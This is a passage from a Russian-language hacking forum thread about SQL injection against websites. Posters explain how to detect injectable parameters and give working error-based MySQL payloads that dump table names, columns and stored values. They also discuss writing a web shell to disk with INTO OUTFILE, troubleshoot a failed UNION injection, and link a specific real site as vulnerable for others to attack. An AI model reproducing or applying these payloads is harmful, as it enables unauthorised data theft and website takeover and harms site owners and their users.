я прочитал вроде понял)) но не понял одного ))) как её найти? что надо писать и где? и как? помогите бо реально туп !
Допустим, ты ломаешь сайт qwerty.ru. Попал ты на страницу qwerty.ru/news.php?id=123. И чтобы проверить есть ли уязвимость, нужно подставить к значению id какой нибудь левый символ, например, кавычку: qwerty.ru/news.php?id=123'. Можно еще попробовать так: qwerty.ru/news.php?id=124-1. Как известно, 124-1=123 Если информация при таком URL выводится та же самая, что и при id=123, то практически наверняка уязвимость имеет место быть.
Кому может пригодится, ссылка на уязвимый сайт - http://www.biochemistry-imm.org/ Другие подобные уязвимые сайты, можно найти в этой теме.
Не очень понял про работу с файлами. Например, мне нужно залить шелл при помощи скул инъекции. Делать надо такой запрос: http://site.ru/index.php?id=5+union+select+1,2,что-то,3,4,5,6+into+outfile+shell.php ? Вместо что-то, кстати, что можно подставить, чтобы загрузить шелл навроде wso?
Попробуй так: +or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))+--+ Если неполучится стучи в асю, помогу - 4000840.
вывод таблиц Code: http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+table_name+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)--+ вывод колонок Code: http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+column_name+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2)--+ вывод значений из таблицы Code: http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,%column_names%)+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.tables++group+by+2)--+
Гет запрос ограничение будет,да и любой скрипт всё равно подставить не получится: ).Нужно тогда и запрос изменять terminated by,enclosed by и т.д. Эти же операторы вряд ли были рассчитаны на гет селект запросы ))).Для работы с файлами ещё понятно...)
Есть страница http://test/test/test.html Попытался сделать инъекцию и вот что вышло http://test/test/1'+UNION+SELECT+1,+2+-- Результат: Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1 query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1 Что я сделал не так и как "добить" эту дырку?
Во-первых, коментарием "+--" ты кавычку не отсечешь. Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.